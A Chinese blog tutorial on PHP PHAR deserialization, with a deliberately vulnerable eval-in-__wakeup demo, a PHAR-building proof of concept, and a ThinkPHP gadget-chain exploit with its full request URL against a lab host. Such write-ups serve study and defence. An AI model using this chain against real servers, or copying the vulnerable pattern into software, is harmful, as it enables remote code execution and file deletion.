PHAR反序列化漏洞

最新推荐文章于 2024-05-01 04:30:00 发布
最新推荐文章于 2024-05-01 04:30:00 发布
阅读量880 收藏 3
点赞数
文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kunkun_xiaomeng/article/details/126629323
版权

       

一:PHAR反序列化漏洞原理

 我们一般利用反序列化漏洞,一般借助unserialize(),但现在很难利用了,所以考虑用一种新的方法,不需要借助unserialize()情况下触发PHP反序列漏洞。漏洞触发师利用了PHAR://伪协议读取phar文件时,会反序列化meta-data存储的信息。话不多说,看案列。

二:利用PHAR执行任意命令

1.创建phar.php文件

// // 正常的PHP后台执行代码,注意需要使用file_exists函数触发

class User {

   var $name;

    function __wakeup()

    {

        @eval( $this->name);

    }

}

$filename = $_GET['input'];

file_exists($filename);

2.创建pharpoc.php

// 定义生成PHAR文件的过程,并包含一个用户自定义序列化对象

class User{

    var $name;

}

@unlink("test.phar");

$phar = new Phar("test.phar");

$phar->startBuffering();

$phar->setStub("<?php __HALT_COMPILER(); ?>");

$o = new User();

$o->name = "phpinfo();";

$phar->setMetadata($o);

$phar->addFromString("test.txt", "test");

$phar->stopBuffering();

3.访问pharpoc.php 生成test.phar文件

4.使用一下参数访问phar.php

三:thinkPhp中的PHAR反序列化漏洞

  1. 寻找目录

全局搜索file_exists找到

public function check($cacheFile, $cacheTime)

    {

        echo $cacheFile."<br/>";

        // 缓存文件不存在, 直接返回false

        if (!file_exists($cacheFile)) {

            return false;

        }

        if (0 != $cacheTime && time() > filemtime($cacheFile) + $cacheTime) {

            // 缓存是否在有效期

            return false;

        }

        return true;

    }

cacheFile可控

  1. 构建POC

namespace think\process\pipes;

use Phar;

class Pipes {}

class Windows extends Pipes{

    private $files = ['/opt/lampp/htdocs/security/upload/test.php'];

}

@unlink("test.phar");

$phar = new Phar("test.phar");

$phar->startBuffering();

$phar->setStub("<?php __HALT_COMPILER(); ?>");

$o = new Windows();

$phar->setMetadata($o);

$phar->addFromString("test.txt", "test");

$phar->stopBuffering();

执行POC生成test.phar保存在服务器上的任意位置

这时发现没有利用点,需要用到thinkphp中存在的严重漏洞非强制路由漏洞,那么什么是非强制路由漏洞呢?thinkphp为了与考虑早期版本的兼容性,默认保留了兼容模式,只定义了类文件,即使不定义路由规则,也可以直接访问,所以在兼容模式的非强制路由情况下,我们可以直接在不定义路由规则的情况下,直接访问控制器并传参

http://192.168.206.140//tpdemo/public/index.php入口文件。

漏洞产生的条件

  1. 使用兼容模式默认开启
  2. 兼容模式参数名为“s”,默认为s

最后访问传参访问即可

http://192.168.206.140//tpdemo/public/index.phps=index/%5Cthink%5Ctemplate%5Cdriver%5CFile/check&cacheFile=phar:///opt/lampp/htdocs/security/unserial/test.phar/test.txt&cacheTime=100

 

不要做小白了
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
codecept.phar
09-23
codecept.phar 测试程序,移动该文件至 存放php 根目录中 存放 php.exe的地方 创建: codecept.bat 输入: ``` @php "%~dp0codecept.phar" %* ``` 使用说明:...
php(phar)反序列化漏洞及各种绕过姿势
MrWangisgoodboy的博客
04-14 4900
概念:序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。简单来说就是我在一个地方构造了一个类,但我要在另一个地方去使用它,那怎么传过去呢?于是就想到了序列化这种东西,将对象先序列化为一个字符串(数据),后续需要使用的时候再进行反序列化即可得到要使用的对象,十分方便。来看看怎么说:所有php里面的值都可以使用函数来返回一个包含字节流的字符串来表示。函数能够重新把字符串变回php原来的值。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。
phar反序列化漏洞
csjjjd的博客
01-27 1343
基础:Phar是一种PHP文件归档格式,它类似于ZIP或JAR文件格式,可以将多个PHP文件打包成一个单独的文件(即Phar文件)。打包后的Phar文件可以像普通的PHP文件一样执行,可以包含PHP代码、文本文件、图像等各种资源,也可以对Phar文件进行签名、压缩和加密,我们还可以在文件包含中使用phar伪协议,可读取.phar文件。phar文件格式:stub.phar 文件标识,格式为xxx; manifest 压缩文件的属性等信息,以序列化存储;
基于框架漏洞的代码审计实战(1)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
05-01 842
某开源项目最新版的CMS,该漏洞已提交至CNVD。
php归档格式:phar文件详解(创建、使用、解包还原提取)
热门推荐
云客的技术博客【云游天下 做客四方】
02-10 1万+
一个php应用程序往往是由多个文件构成的,如果能把他们集中为一个文件来分发和运行是很方便的,这样的列子有很多,比如在window操作系统上面的安装程序、一个jquery库等等,为了做到这点php采用了phar文档文件格式,这个概念源自java的jar,但是在设计时主要针对 PHPWeb 环境,与 JAR 归档不同的是Phar 归档可由 PHP 本身处理,因此不需要使用额外的工具来创建或使用,
mysql 反序列化函数_利用phar协议造成php反序列化
weixin_39843986的博客
01-21 406
0x00前言在php中反序列漏洞,形成的原因首先需要一个unserialize()函数来处理我们传入的可控的序列化payload。但是如果对unserialize()传入的内容进行限制,甚至就不存在可利用的unserialize()函数的时候,就可以借助phar协议触发反序列化操作了0x01 构造有反序列化payload的phar文件首先,phar是一种php语言的文件的后缀,所以生成phar文件...
第二十三天 phar反序列化漏洞
代码审计
04-01 2211
关于这个方法在2018年 BlackHat 大会上的 Sam Thomas 分享了 File Operation Induced Unserialization via the “phar://” Stream Wrapper ,该研究员指出该方法在 文件系统函数 ( file_get_contents 、 unlink 等)参数可控的情况下,配合 phar://伪协议 ,可以不依赖反序列化函数 unserialize() 直接进行反序列化的操作。 zip rar压缩文件包 类似 默认支持phar协议的使
composer.phar
02-03
composer.phar composer.phar composer.phar composer.phar
泛微E-Office10远程代码执行漏洞
最新发布
05-06
攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行。成功利用这一漏洞的攻击者可以执行服务器上的任意代码,从而获得服务器的控制权限。在最糟糕的情况下,这...
mix-phar-skeleton:Phar命令行程序开发框架
04-24
Mix Phar Skeleton 命令行单执行文件 Phar 开发程序骨架,Mix 封装的命令行基础设施在骨架中都可使用。 我们提供了打包工具 ,可以将本项目打包为 Phar 文件(就像 golang 编译成执行文件一样)。 PHP 原本就是一个...
关于php----phar伪协议和phar文件反序列化漏洞利用
m0_62107966的博客
09-12 2027
关于php----phar伪协议和phar文件反序列化漏洞利用pharphp archive)含义为php 归档文件。如果一个由多个文件构成的php应用程序,可以合并打包为一个文件夹,类似于javaweb项目里的jar文件的话,对于程序员来说是很方便的。在PHP5.3之后支持了类似Java的jar包,名为phar。用来将多个PHP文件打包为一个文件。要生成phar文件的话也是很方便,不需要借助额外的工具来创建或者使用,通过php脚本运行就自动在该脚本所在目录下自动创建。
phar文件上传的骚姿势(绕过phar、_HALT)
qq_62046696的博客
10-07 1832
前面也讲过一次phar文件上传的东西,但是那都是过滤比较低,仅仅过滤了后缀。知道今天看到了一篇好的文章。
thinkphp5 注入 反序列化写文件 phar反序列化
yggcwhat
09-28 2215
thinkphp5框架 注入 反序列化写文件 phar反序列化
一个phar://的漏洞
Xi4or0uji
10-17 5790
前段时间打了个护网杯,题目质量是真的高,肉鸡又菜了一整场,遇到了一个不太会的东西,复现了一波,记录下好吧。 这个鬼东西就是phar://的序列化的漏洞 介绍一下 phar://跟php://filter 、data://那些一样,都是流包装,可以将一组php文件进行打包,可以创建默认执行的stub stub 就是一个标志,格式xxx&lt;?php xxxxx; __HALT_COMPIL...
Phar反序列化漏洞原理
soldi_er的博客
06-08 404
文章目录   来自Secarma的安全研究员Sam Thomas发现,可以在不使用php函数unserialize()的前提下,引起严重的php对象注入漏洞。   
反序列化漏洞 (2)------php 反序列化漏洞 ----- session反序列化问题,phar,pop,绕过__wakeup()
Z_Grant的博客
11-19 1504
文章目录一、漏洞简述php反序列化漏洞又称对象注入二、漏洞利用过程(1) 绕过__wakeup()的限制三、Session反序列化漏洞(1) Session序列化机制PHP处理器的三种序列化方式:配置文件 php.ini 的说明 一、漏洞简述php反序列化漏洞又称对象注入 原理:在php反序列化的时候,反序列化的内容可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函...
利用phar实行php反序列化命令执行漏洞复现
aobipi2343的博客
09-03 404
利用phar实行php反序列化命令执行(测试环境复现) 前言 一般说到反序列化漏洞,第一反应都是unserialize()函数。然而安全研究员Sam Thomas分享了议题”It’s a PHP unserialization vulnerability Jim, but not as we know it”,利用phar伪协议会将用户自定义的meta-data序列化的形式存储这一特...
PHP反序列化漏洞的新攻击面
Fly_鹏程万里
09-17 1195
今年8月份的美国blackhat上Sam Thomas提出了一种新的反序列化攻击场景,而且这种场景可能伴随着xxe、ssrf或者其他相关漏洞的出现而出现。本文将会对此进行介绍,并针对wordpress中的漏洞进行复现。 一、 引言 自从2009年Stefan Essar提出PHP反序列化问题以来,已经有大量的CVE出现,例如CVE-2017-12934、CVE-2017-12933等。今年8月...
php反序列化漏洞习题
09-06
关于PHP反序列化漏洞的习题,可以使用GlobIterator类和ArrayObject类来进行练习。其中,GlobIterator类的题目是被遗忘的反序列化,ArrayObject类的题目是easy_phpPHP反序列化漏洞是一种安全漏洞,其中一个具体的例子是CVE-2016-7124,该漏洞存在于php5<5.6.25和php7<7.0.10的版本中。漏洞的产生原因是由于反序列化时对输入的不当处理所导致的。 了解PHP反序列化漏洞的习题,需要掌握类与对象、反序列化基础知识以及一些与魔术方法相关的内容,如构造和折构方法(__construct()、__destruct())、序列化和反序列化方法(__sleep()、__wakeup())、错误调用魔术方法(__callStatic()、__get()、__set()、__isset()、__unset()、__clone())等。反序列化漏洞的成因较复杂,例如POP链构造、POC链反推法等。 此外,还可以学习字符串逃逸和__wakeup魔术方法绕过漏洞的相关知识。其中,__wakeup魔术方法绕过漏洞的产生原因是__wakeup方法可以在反序列化时被绕过,从而可能导致安全漏洞PHP反序列化漏洞还可以通过引用的利用方法来进行学习。另外,还可以学习SESSION反序列化漏洞phar反序列化漏洞的习题。其中,SESSION反序列化漏洞涉及到不同处理器的不同储存格式,而phar反序列化漏洞需要了解phar的构造和使用条件。 通过这些习题的学习,可以更好地理解PHP反序列化漏洞以及如何进行防范和修复。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [PHP反序列化漏洞(最全面最详细有例题)](https://blog.csdn.net/m0_73728268/article/details/129893800)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不要做小白了

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值